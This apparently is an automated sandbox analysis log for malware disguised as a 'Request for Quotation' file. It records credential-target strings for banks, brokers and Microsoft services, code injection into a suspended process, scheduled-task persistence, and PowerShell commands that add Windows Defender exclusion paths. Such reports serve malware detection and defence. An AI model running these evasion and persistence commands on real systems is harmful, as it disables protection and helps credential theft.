Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597797 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597469 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597359 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597250 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597139 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597031 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596922 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596812 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596594 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596484 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596375 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596265 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 596047 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595719 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595281 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595172 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 595062 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594953 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594843 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594720 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599541
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598560
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 598000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597885
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597781
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597672
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597562
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597453
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597344
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597232
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597125
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596546
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596219
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595641
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594875
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594765
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Thread delayed: delay time: 594547
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3826307981.0000000001348000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfoX
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3826220785.0000000000C99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllok
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: NuDUTBObHpKADz.exe, 0000000A.00000002.1468102089.0000000001162000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9548 LdrInitializeThunk, 9_2_06DE9548
Enables debug privileges
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory written: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
